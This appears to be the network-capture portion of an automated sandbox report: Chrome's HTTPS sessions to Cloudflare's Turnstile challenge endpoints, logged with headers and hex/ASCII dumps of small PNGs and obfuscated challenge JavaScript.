                                                                2025-01-13 19:54:51 UTC1369INData Raw: 2c 66 59 2c 67 61 2c 67 67 2c 67 68 2c 67 69 2c 67 73 2c 67 44 2c 67 48 2c 66 33 2c 66 34 29 7b 66 6f 72 28 67 4a 3d 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 2c 67 49 2c 65 2c 66 29 7b 66 6f 72 28 67 49 3d 62 2c 65 3d 63 28 29 3b 21 21 5b 5d 3b 29 74 72 79 7b 69 66 28 66 3d 70 61 72 73 65 49 6e 74 28 67 49 28 37 32 37 29 29 2f 31 2a 28 70 61 72 73 65 49 6e 74 28 67 49 28 31 31 32 36 29 29 2f 32 29 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 33 36 35 29 29 2f 33 2a 28 70 61 72 73 65 49 6e 74 28 67 49 28 31 30 35 30 29 29 2f 34 29 2b 70 61 72 73 65 49 6e 74 28 67 49 28 31 33 32 39 29 29 2f 35 2b 70 61 72 73 65 49 6e 74 28 67 49 28 31 32 31 34 29 29 2f 36 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 37 30 33 29 29 2f 37 29 2b 70 61 72 73 65 49 6e 74 28 67
                                                                Data Ascii: ,fY,ga,gg,gh,gi,gs,gD,gH,f3,f4){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=parseInt(gI(727))/1*(parseInt(gI(1126))/2)+-parseInt(gI(365))/3*(parseInt(gI(1050))/4)+parseInt(gI(1329))/5+parseInt(gI(1214))/6*(-parseInt(gI(1703))/7)+parseInt(g
                                                                2025-01-13 19:54:51 UTC1369INData Raw: 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3e 69 7d 2c 27 71 44 78 55 6a 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 3d 3d 68 7d 2c 27 6c 78 70 6b 49 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 6d 73 4f 56 66 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 7c 69 7d 2c 27 67 63 75 55 64 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 3c 69 7d 2c 27 67 54 6c 4d 75 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 52 51 62 5a 76 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 7c 68 7d 2c 27 75 49 75 6c 6f 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74
                                                                Data Ascii: tion(h,i){return h>i},'qDxUj':function(h,i){return i==h},'lxpkI':function(h,i){return h(i)},'msOVf':function(h,i){return h|i},'gcuUd':function(h,i){return h<<i},'gTlMu':function(h,i){return h(i)},'RQbZv':function(h,i){return i|h},'uIulo':function(h,i){ret
                                                                2025-01-13 19:54:51 UTC1369INData Raw: 4d 29 7b 69 66 28 67 5a 3d 67 58 2c 69 3d 3d 6e 75 6c 6c 29 72 65 74 75 72 6e 27 27 3b 66 6f 72 28 78 3d 7b 7d 2c 42 3d 7b 7d 2c 43 3d 27 27 2c 44 3d 32 2c 45 3d 33 2c 46 3d 32 2c 47 3d 5b 5d 2c 48 3d 30 2c 49 3d 30 2c 4a 3d 30 3b 4a 3c 69 5b 67 5a 28 37 35 39 29 5d 3b 4a 2b 3d 31 29 69 66 28 67 5a 28 31 36 30 39 29 21 3d 3d 67 5a 28 31 36 30 39 29 29 7b 66 6f 72 28 4f 3d 27 27 2c 50 3d 30 3b 64 5b 67 5a 28 31 32 30 32 29 5d 28 50 2c 34 2a 47 5b 67 5a 28 37 35 39 29 5d 29 3b 4f 2b 3d 64 5b 67 5a 28 31 30 38 39 29 5d 28 64 5b 67 5a 28 31 33 33 33 29 5d 5b 67 5a 28 35 31 36 29 5d 28 6a 5b 64 5b 67 5a 28 31 30 37 37 29 5d 28 50 2c 32 29 5d 3e 3e 64 5b 67 5a 28 33 39 37 29 5d 28 38 2a 28 33 2d 64 5b 67 5a 28 31 30 39 32 29 5d 28 50 2c 34 29 29 2c 34 29 26 31
                                                                Data Ascii: M){if(gZ=gX,i==null)return'';for(x={},B={},C='',D=2,E=3,F=2,G=[],H=0,I=0,J=0;J<i[gZ(759)];J+=1)if(gZ(1609)!==gZ(1609)){for(O='',P=0;d[gZ(1202)](P,4*G[gZ(759)]);O+=d[gZ(1089)](d[gZ(1333)][gZ(516)](j[d[gZ(1077)](P,2)]>>d[gZ(397)](8*(3-d[gZ(1092)](P,4)),4)&1
                                                                2025-01-13 19:54:51 UTC1369INData Raw: 29 5d 5b 67 5a 28 31 36 34 37 29 5d 28 42 2c 43 29 29 7b 69 66 28 64 5b 67 5a 28 31 33 34 35 29 5d 28 67 5a 28 31 35 39 30 29 2c 67 5a 28 31 35 39 30 29 29 29 7b 69 66 28 32 35 36 3e 43 5b 67 5a 28 39 31 36 29 5d 28 30 29 29 7b 66 6f 72 28 73 3d 30 3b 73 3c 46 3b 48 3c 3c 3d 31 2c 64 5b 67 5a 28 34 32 30 29 5d 28 49 2c 64 5b 67 5a 28 31 30 39 35 29 5d 28 6a 2c 31 29 29 3f 28 49 3d 30 2c 47 5b 67 5a 28 33 32 35 29 5d 28 64 5b 67 5a 28 31 32 35 37 29 5d 28 6f 2c 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 73 2b 2b 29 3b 66 6f 72 28 4d 3d 43 5b 67 5a 28 39 31 36 29 5d 28 30 29 2c 73 3d 30 3b 38 3e 73 3b 48 3d 64 5b 67 5a 28 31 36 37 31 29 5d 28 48 2c 31 29 7c 64 5b 67 5a 28 33 34 32 29 5d 28 4d 2c 31 29 2c 49 3d 3d 6a 2d 31 3f 28 49 3d 30 2c 47 5b 67 5a 28 33 32
                                                                Data Ascii: )][gZ(1647)](B,C)){if(d[gZ(1345)](gZ(1590),gZ(1590))){if(256>C[gZ(916)](0)){for(s=0;s<F;H<<=1,d[gZ(420)](I,d[gZ(1095)](j,1))?(I=0,G[gZ(325)](d[gZ(1257)](o,H)),H=0):I++,s++);for(M=C[gZ(916)](0),s=0;8>s;H=d[gZ(1671)](H,1)|d[gZ(342)](M,1),I==j-1?(I=0,G[gZ(32
                                                                2025-01-13 19:54:51 UTC1369INData Raw: 47 2c 48 2c 49 2c 4a 2c 4b 2c 4d 2c 4c 29 7b 66 6f 72 28 68 33 3d 67 58 2c 73 3d 5b 5d 2c 78 3d 34 2c 42 3d 34 2c 43 3d 33 2c 44 3d 5b 5d 2c 47 3d 6f 28 30 29 2c 48 3d 6a 2c 49 3d 31 2c 45 3d 30 3b 33 3e 45 3b 73 5b 45 5d 3d 45 2c 45 2b 3d 31 29 3b 66 6f 72 28 4a 3d 30 2c 4b 3d 4d 61 74 68 5b 68 33 28 31 30 34 34 29 5d 28 32 2c 32 29 2c 46 3d 31 3b 46 21 3d 4b 3b 68 33 28 31 36 33 32 29 21 3d 3d 64 5b 68 33 28 31 34 38 31 29 5d 3f 28 4c 3d 64 5b 68 33 28 31 30 34 30 29 5d 28 47 2c 48 29 2c 48 3e 3e 3d 31 2c 30 3d 3d 48 26 26 28 48 3d 6a 2c 47 3d 6f 28 49 2b 2b 29 29 2c 4a 7c 3d 64 5b 68 33 28 31 36 33 39 29 5d 28 64 5b 68 33 28 39 36 35 29 5d 28 30 2c 4c 29 3f 31 3a 30 2c 46 29 2c 46 3c 3c 3d 31 29 3a 46 3d 47 5b 68 33 28 34 38 31 29 5d 29 3b 73 77 69 74
                                                                Data Ascii: G,H,I,J,K,M,L){for(h3=gX,s=[],x=4,B=4,C=3,D=[],G=o(0),H=j,I=1,E=0;3>E;s[E]=E,E+=1);for(J=0,K=Math[h3(1044)](2,2),F=1;F!=K;h3(1632)!==d[h3(1481)]?(L=d[h3(1040)](G,H),H>>=1,0==H&&(H=j,G=o(I++)),J|=d[h3(1639)](d[h3(965)](0,L)?1:0,F),F<<=1):F=G[h3(481)]);swit
                                                                2025-01-13 19:54:51 UTC1369INData Raw: 34 29 5d 28 32 2c 43 29 2c 43 2b 2b 29 7d 7d 7d 2c 67 3d 7b 7d 2c 67 5b 67 58 28 31 35 31 32 29 5d 3d 66 2e 68 2c 67 7d 28 29 2c 65 4d 5b 67 4a 28 33 36 36 29 5d 3d 21 5b 5d 2c 65 4d 5b 67 4a 28 31 30 32 30 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 68 6e 29 7b 69 66 28 68 6e 3d 67 4a 2c 65 4d 5b 68 6e 28 33 36 36 29 5d 29 72 65 74 75 72 6e 3b 65 4d 5b 68 6e 28 33 36 36 29 5d 3d 21 21 5b 5d 7d 2c 65 5a 3d 30 2c 65 4e 5b 67 4a 28 31 35 35 36 29 5d 3d 3d 3d 67 4a 28 36 36 35 29 3f 65 4e 5b 67 4a 28 34 36 33 29 5d 28 67 4a 28 31 34 32 30 29 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 73 65 74 54 69 6d 65 6f 75 74 28 66 32 2c 30 29 7d 29 3a 73 65 74 54 69 6d 65 6f 75 74 28 66 32 2c 30 29 2c 66 33 3d 5b 5d 2c 66 34 3d 30 3b 32 35 36 3e 66 34 3b 66 33 5b 66 34 5d 3d 53 74 72
                                                                Data Ascii: 4)](2,C),C++)}}},g={},g[gX(1512)]=f.h,g}(),eM[gJ(366)]=![],eM[gJ(1020)]=function(hn){if(hn=gJ,eM[hn(366)])return;eM[hn(366)]=!![]},eZ=0,eN[gJ(1556)]===gJ(665)?eN[gJ(463)](gJ(1420),function(){setTimeout(f2,0)}):setTimeout(f2,0),f3=[],f4=0;256>f4;f3[f4]=Str
                                                                2025-01-13 19:54:51 UTC1369INData Raw: 7c 7c 28 6a 5b 48 5d 3d 5b 5d 29 2c 6a 5b 48 5d 5b 69 62 28 33 32 35 29 5d 28 47 29 7d 7d 2c 66 42 3d 67 4a 28 31 30 34 37 29 5b 67 4a 28 38 32 34 29 5d 28 27 3b 27 29 2c 66 43 3d 66 42 5b 67 4a 28 31 32 37 30 29 5d 5b 67 4a 28 31 31 30 39 29 5d 28 66 42 29 2c 65 4d 5b 67 4a 28 37 31 32 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 67 2c 68 2c 69 64 2c 69 2c 6a 2c 6b 2c 6c 2c 6d 29 7b 66 6f 72 28 69 64 3d 67 4a 2c 69 3d 7b 27 57 42 4e 4b 6f 27 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 6f 29 7b 72 65 74 75 72 6e 20 6e 3c 6f 7d 2c 27 55 61 58 59 64 27 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 6f 29 7b 72 65 74 75 72 6e 20 6e 3d 3d 3d 6f 7d 2c 27 71 6e 43 6e 71 27 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 6f 29 7b 72 65 74 75 72 6e 20 6e 28 6f 29 7d 2c 27 6f 4a 50 63 67 27 3a 66 75 6e
                                                                Data Ascii: ||(j[H]=[]),j[H][ib(325)](G)}},fB=gJ(1047)[gJ(824)](';'),fC=fB[gJ(1270)][gJ(1109)](fB),eM[gJ(712)]=function(g,h,id,i,j,k,l,m){for(id=gJ,i={'WBNKo':function(n,o){return n<o},'UaXYd':function(n,o){return n===o},'qnCnq':function(n,o){return n(o)},'oJPcg':fun
                                                                2025-01-13 19:54:51 UTC1369INData Raw: 6e 28 45 2c 46 29 7b 72 65 74 75 72 6e 20 45 20 69 6e 73 74 61 6e 63 65 6f 66 20 46 7d 2c 27 70 41 6e 71 79 27 3a 66 75 6e 63 74 69 6f 6e 28 45 2c 46 29 7b 72 65 74 75 72 6e 20 45 7c 7c 46 7d 2c 27 70 6f 6d 56 62 27 3a 69 68 28 39 38 34 29 2c 27 63 57 69 42 4d 27 3a 66 75 6e 63 74 69 6f 6e 28 45 2c 46 29 7b 72 65 74 75 72 6e 20 45 2b 46 7d 2c 27 59 50 70 6b 43 27 3a 66 75 6e 63 74 69 6f 6e 28 45 2c 46 29 7b 72 65 74 75 72 6e 20 45 2b 46 7d 2c 27 68 52 44 64 6c 27 3a 66 75 6e 63 74 69 6f 6e 28 45 2c 46 29 7b 72 65 74 75 72 6e 20 45 2b 46 7d 2c 27 64 56 46 43 4f 27 3a 66 75 6e 63 74 69 6f 6e 28 45 2c 46 29 7b 72 65 74 75 72 6e 20 45 2b 46 7d 2c 27 72 47 55 78 64 27 3a 69 68 28 31 33 33 38 29 2c 27 4d 4e 4f 4d 51 27 3a 69 68 28 31 37 30 30 29 2c 27 58 74 7a
                                                                Data Ascii: n(E,F){return E instanceof F},'pAnqy':function(E,F){return E||F},'pomVb':ih(984),'cWiBM':function(E,F){return E+F},'YPpkC':function(E,F){return E+F},'hRDdl':function(E,F){return E+F},'dVFCO':function(E,F){return E+F},'rGUxd':ih(1338),'MNOMQ':ih(1700),'Xtz


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                10192.168.2.549725104.18.94.414433184C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-13 19:54:51 UTC739OUTGET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1
                                                                Host: challenges.cloudflare.com
                                                                Connection: keep-alive
                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                sec-ch-ua-mobile: ?0
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                sec-ch-ua-platform: "Windows"
                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                Sec-Fetch-Site: same-origin
                                                                Sec-Fetch-Mode: no-cors
                                                                Sec-Fetch-Dest: image
                                                                Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/ttfv6/0x4AAAAAAA4pnGQDZ108QgTx/auto/fbE/normal/auto/
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2025-01-13 19:54:51 UTC240INHTTP/1.1 200 OK
                                                                Date: Mon, 13 Jan 2025 19:54:51 GMT
                                                                Content-Type: image/png
                                                                Content-Length: 61
                                                                Connection: close
                                                                cache-control: max-age=2629800, public
                                                                Server: cloudflare
                                                                CF-RAY: 9017f0c62c1f6a4e-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                2025-01-13 19:54:51 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                Data Ascii: PNGIHDRsIDAT$IENDB`


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                11192.168.2.549730104.18.94.414433184C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-13 19:54:51 UTC385OUTGET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1
                                                                Host: challenges.cloudflare.com
                                                                Connection: keep-alive
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                Accept: */*
                                                                Sec-Fetch-Site: none
                                                                Sec-Fetch-Mode: cors
                                                                Sec-Fetch-Dest: empty
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2025-01-13 19:54:52 UTC240INHTTP/1.1 200 OK
                                                                Date: Mon, 13 Jan 2025 19:54:52 GMT
                                                                Content-Type: image/png
                                                                Content-Length: 61
                                                                Connection: close
                                                                cache-control: max-age=2629800, public
                                                                Server: cloudflare
                                                                CF-RAY: 9017f0caffbe43e2-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                2025-01-13 19:54:52 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                Data Ascii: PNGIHDRsIDAT$IENDB`


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                12192.168.2.549729104.18.94.414433184C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-13 19:54:51 UTC433OUTGET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=9017f0c19bf64357&lang=auto HTTP/1.1
                                                                Host: challenges.cloudflare.com
                                                                Connection: keep-alive
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                Accept: */*
                                                                Sec-Fetch-Site: none
                                                                Sec-Fetch-Mode: cors
                                                                Sec-Fetch-Dest: empty
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2025-01-13 19:54:52 UTC331INHTTP/1.1 200 OK
                                                                Date: Mon, 13 Jan 2025 19:54:52 GMT
                                                                Content-Type: application/javascript; charset=UTF-8
                                                                Content-Length: 116212
                                                                Connection: close
                                                                cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                Server: cloudflare
                                                                CF-RAY: 9017f0caffc043e2-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                2025-01-13 19:54:52 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 55 52 61 4f 61 38 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70 74 73 25 32 46 63 6c 6f 75 64 66 6c 61 72 65 2d 63 68 61 6c 6c 65 6e 67 65 73 25 32 46 25 32 33 62 72 6f 77 73 65 72 2d 73 75 70 70 6f 72 74 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 74 65 72 6d 73 22 3a 22 68 74 74 70 73 25 33 41 25 32
                                                                Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.URaOa8={"metadata":{"challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support","challenge.terms":"https%3A%2
                                                                2025-01-13 19:54:52 UTC1369INData Raw: 74 25 32 30 68 61 73 25 32 30 62 65 65 6e 25 32 30 73 75 63 63 65 73 73 66 75 6c 6c 79 25 32 30 73 75 62 6d 69 74 74 65 64 22 2c 22 6e 6f 74 5f 65 6d 62 65 64 64 65 64 22 3a 22 54 68 69 73 25 32 30 63 68 61 6c 6c 65 6e 67 65 25 32 30 6d 75 73 74 25 32 30 62 65 25 32 30 65 6d 62 65 64 64 65 64 25 32 30 69 6e 74 6f 25 32 30 61 25 32 30 70 61 72 65 6e 74 25 32 30 70 61 67 65 2e 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 69 66 72 61 6d 65 5f 61 6c 74 22 3a 22 57 69 64 67 65 74 25 32 30 63 6f 6e 74 61 69 6e 69 6e 67 25 32 30 61 25 32 30 43 6c 6f 75 64 66 6c 61 72 65 25 32 30 73 65 63 75 72 69 74 79 25 32 30 63 68 61 6c 6c 65 6e 67 65 22 2c 22 69 6e 76 61 6c 69 64 5f 73 69 74 65 6b 65 79 22 3a 22 49 6e 76 61 6c 69 64 25 32 30 73 69 74 65 6b 65 79 2e 25 32 30 43 6f
                                                                Data Ascii: t%20has%20been%20successfully%20submitted","not_embedded":"This%20challenge%20must%20be%20embedded%20into%20a%20parent%20page.","turnstile_iframe_alt":"Widget%20containing%20a%20Cloudflare%20security%20challenge","invalid_sitekey":"Invalid%20sitekey.%20Co
                                                                2025-01-13 19:54:52 UTC1369INData Raw: 2c 66 58 2c 67 31 2c 67 32 2c 67 35 2c 67 36 2c 67 43 2c 67 47 2c 67 48 2c 67 33 2c 67 34 29 7b 66 6f 72 28 67 4a 3d 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 2c 67 49 2c 65 2c 66 29 7b 66 6f 72 28 67 49 3d 62 2c 65 3d 63 28 29 3b 21 21 5b 5d 3b 29 74 72 79 7b 69 66 28 66 3d 2d 70 61 72 73 65 49 6e 74 28 67 49 28 36 31 35 29 29 2f 31 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 32 33 38 29 29 2f 32 29 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 35 34 34 29 29 2f 33 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 39 38 30 29 29 2f 34 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 35 38 36 29 29 2f 35 29 2b 70 61 72 73 65 49 6e 74 28 67 49 28 31 37 37 30 29 29 2f 36 2b 70 61 72 73 65 49 6e 74 28 67 49 28 38 38 37 29 29 2f 37 2a 28 2d 70 61 72 73 65 49 6e 74 28
                                                                Data Ascii: ,fX,g1,g2,g5,g6,gC,gG,gH,g3,g4){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=-parseInt(gI(615))/1*(-parseInt(gI(1238))/2)+-parseInt(gI(544))/3+-parseInt(gI(980))/4*(-parseInt(gI(1586))/5)+parseInt(gI(1770))/6+parseInt(gI(887))/7*(-parseInt(
                                                                2025-01-13 19:54:52 UTC1369INData Raw: 3a 27 27 2c 6f 3d 6b 5b 67 4d 28 31 30 32 32 29 5d 28 6b 5b 67 4d 28 31 30 39 33 29 5d 28 6b 5b 67 4d 28 31 30 38 35 29 5d 2b 6e 2b 6b 5b 67 4d 28 37 31 30 29 5d 2c 31 29 2b 67 4d 28 31 37 30 39 29 2b 65 4d 5b 67 4d 28 31 30 38 31 29 5d 5b 67 4d 28 37 31 39 29 5d 2b 27 2f 27 2c 65 4d 5b 67 4d 28 31 30 38 31 29 5d 2e 63 48 29 2b 27 2f 27 2b 65 4d 5b 67 4d 28 31 30 38 31 29 5d 5b 67 4d 28 31 34 30 38 29 5d 2c 73 3d 7b 7d 2c 73 5b 67 4d 28 31 35 31 31 29 5d 3d 65 4d 5b 67 4d 28 31 30 38 31 29 5d 5b 67 4d 28 31 35 31 31 29 5d 2c 73 5b 67 4d 28 39 39 35 29 5d 3d 65 4d 5b 67 4d 28 31 30 38 31 29 5d 5b 67 4d 28 39 39 35 29 5d 2c 73 5b 67 4d 28 31 37 38 37 29 5d 3d 65 4d 5b 67 4d 28 31 30 38 31 29 5d 5b 67 4d 28 31 37 38 37 29 5d 2c 73 5b 67 4d 28 31 34 35 31 29
                                                                Data Ascii: :'',o=k[gM(1022)](k[gM(1093)](k[gM(1085)]+n+k[gM(710)],1)+gM(1709)+eM[gM(1081)][gM(719)]+'/',eM[gM(1081)].cH)+'/'+eM[gM(1081)][gM(1408)],s={},s[gM(1511)]=eM[gM(1081)][gM(1511)],s[gM(995)]=eM[gM(1081)][gM(995)],s[gM(1787)]=eM[gM(1081)][gM(1787)],s[gM(1451)
                                                                2025-01-13 19:54:52 UTC1369INData Raw: 5d 28 67 4e 28 31 35 34 39 29 2c 67 4e 28 31 36 30 31 29 29 29 68 3d 4a 53 4f 4e 5b 67 4e 28 39 38 38 29 5d 28 65 29 3b 65 6c 73 65 7b 66 6f 72 28 76 3d 67 5b 67 4e 28 31 35 30 39 29 5d 28 74 68 69 73 2e 68 5b 39 39 2e 33 32 5e 74 68 69 73 2e 67 5d 5b 33 5d 2c 67 5b 67 4e 28 36 38 31 29 5d 28 31 39 31 2b 74 68 69 73 2e 68 5b 67 5b 67 4e 28 31 35 30 39 29 5d 28 39 39 2c 74 68 69 73 2e 67 29 5d 5b 31 5d 5b 67 4e 28 31 33 35 34 29 5d 28 74 68 69 73 2e 68 5b 67 5b 67 4e 28 31 30 30 34 29 5d 28 39 39 2c 74 68 69 73 2e 67 29 5d 5b 30 5d 2b 2b 29 2c 32 35 35 29 29 5e 32 35 32 2e 38 33 2c 78 3d 67 5b 67 4e 28 31 36 33 30 29 5d 28 74 68 69 73 2e 68 5b 74 68 69 73 2e 67 5e 39 39 5d 5b 33 5d 2c 67 5b 67 4e 28 36 33 31 29 5d 28 74 68 69 73 2e 68 5b 74 68 69 73 2e 67
                                                                Data Ascii: ](gN(1549),gN(1601)))h=JSON[gN(988)](e);else{for(v=g[gN(1509)](this.h[99.32^this.g][3],g[gN(681)](191+this.h[g[gN(1509)](99,this.g)][1][gN(1354)](this.h[g[gN(1004)](99,this.g)][0]++),255))^252.83,x=g[gN(1630)](this.h[this.g^99][3],g[gN(631)](this.h[this.g
                                                                2025-01-13 19:54:52 UTC1369INData Raw: 31 65 33 29 2c 65 4d 5b 67 50 28 31 33 35 39 29 5d 5b 67 50 28 31 37 35 32 29 5d 28 67 50 28 39 35 36 29 2c 65 29 29 3b 72 65 74 75 72 6e 21 5b 5d 7d 2c 65 51 3d 30 2c 65 54 3d 7b 7d 2c 65 54 5b 67 4a 28 31 32 31 30 29 5d 3d 65 53 2c 65 4d 5b 67 4a 28 31 30 37 34 29 5d 3d 65 54 2c 65 56 3d 65 4d 5b 67 4a 28 31 30 38 31 29 5d 5b 67 4a 28 31 31 32 32 29 5d 5b 67 4a 28 31 31 30 38 29 5d 2c 65 57 3d 65 4d 5b 67 4a 28 31 30 38 31 29 5d 5b 67 4a 28 31 31 32 32 29 5d 5b 67 4a 28 31 32 39 39 29 5d 2c 65 58 3d 65 4d 5b 67 4a 28 31 30 38 31 29 5d 5b 67 4a 28 31 31 32 32 29 5d 5b 67 4a 28 37 34 38 29 5d 2c 66 39 3d 21 5b 5d 2c 66 6c 3d 75 6e 64 65 66 69 6e 65 64 2c 65 4d 5b 67 4a 28 31 30 33 32 29 5d 28 67 4a 28 37 34 30 29 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 68 41
                                                                Data Ascii: 1e3),eM[gP(1359)][gP(1752)](gP(956),e));return![]},eQ=0,eT={},eT[gJ(1210)]=eS,eM[gJ(1074)]=eT,eV=eM[gJ(1081)][gJ(1122)][gJ(1108)],eW=eM[gJ(1081)][gJ(1122)][gJ(1299)],eX=eM[gJ(1081)][gJ(1122)][gJ(748)],f9=![],fl=undefined,eM[gJ(1032)](gJ(740),function(c,hA
                                                                2025-01-13 19:54:52 UTC1369INData Raw: 29 7b 72 65 74 75 72 6e 20 66 54 28 66 55 28 63 29 29 7d 7d 2c 66 57 3d 7b 7d 2c 66 57 5b 67 4a 28 31 33 32 37 29 5d 3d 27 6f 27 2c 66 57 5b 67 4a 28 31 34 36 38 29 5d 3d 27 73 27 2c 66 57 5b 67 4a 28 31 37 36 35 29 5d 3d 27 75 27 2c 66 57 5b 67 4a 28 31 31 36 38 29 5d 3d 27 7a 27 2c 66 57 5b 67 4a 28 36 30 39 29 5d 3d 27 6e 27 2c 66 57 5b 67 4a 28 38 35 32 29 5d 3d 27 49 27 2c 66 57 5b 67 4a 28 38 31 35 29 5d 3d 27 62 27 2c 66 58 3d 66 57 2c 65 4d 5b 67 4a 28 31 36 33 37 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 67 2c 68 2c 69 2c 6a 2c 69 72 2c 6f 2c 78 2c 42 2c 43 2c 44 2c 45 2c 46 29 7b 69 66 28 69 72 3d 67 4a 2c 6f 3d 7b 27 74 68 73 53 58 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 48 3d 3d 3d 47 7d 2c 27 62 56 6a 6a 58 27 3a 69 72
                                                                Data Ascii: ){return fT(fU(c))}},fW={},fW[gJ(1327)]='o',fW[gJ(1468)]='s',fW[gJ(1765)]='u',fW[gJ(1168)]='z',fW[gJ(609)]='n',fW[gJ(852)]='I',fW[gJ(815)]='b',fX=fW,eM[gJ(1637)]=function(g,h,i,j,ir,o,x,B,C,D,E,F){if(ir=gJ,o={'thsSX':function(G,H){return H===G},'bVjjX':ir
